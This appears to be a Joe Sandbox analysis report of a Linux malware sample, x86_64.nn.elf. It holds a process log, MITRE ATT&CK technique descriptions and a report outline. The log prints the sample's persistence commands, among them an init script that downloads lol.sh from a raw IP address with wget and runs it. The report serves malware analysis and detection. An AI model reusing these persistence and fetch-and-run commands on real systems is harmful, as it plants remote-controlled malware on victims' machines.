Arguments:	sh -c "systemctl enable custom.service >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable custom.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	279351defe09a28e3c35194c0e594f37

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/system
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	279351defe09a28e3c35194c0e594f37

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/system /etc/rcS.d/S99system
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	279351defe09a28e3c35194c0e594f37

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	279351defe09a28e3c35194c0e594f37

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/sh
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	279351defe09a28e3c35194c0e594f37

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/usr/bin/mkdir
Arguments:	mkdir -p /etc/rc.d
File size:	88408 bytes
MD5 hash:	088c9d1df5a28ed16c726eca15964cb7

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	279351defe09a28e3c35194c0e594f37

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/sh /etc/rc.d/S99sh
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	279351defe09a28e3c35194c0e594f37

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	279351defe09a28e3c35194c0e594f37

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/tmp/x86_64.nn.elf
Arguments:	-
File size:	80064 bytes
MD5 hash:	279351defe09a28e3c35194c0e594f37

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:23:07
Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	08:23:08
Start date (UTC):	27/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:23:08
Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	08:23:08
Start date (UTC):	27/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:23:08
Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report x86_64.nn.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/boot/bootcmd

/etc/init.d/sh

/etc/init.d/system

/etc/inittab

/etc/motd

/etc/profile

/etc/rc.local

/etc/systemd/system/custom.service

/memfd:snapd-env-generator (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: dash PID: 5509, Parent PID: 3670

General

Chronological Activities

Analysis Process: rm PID: 5509, Parent PID: 3670

General

Chronological Activities

Linux Analysis Report
x86_64.nn.elf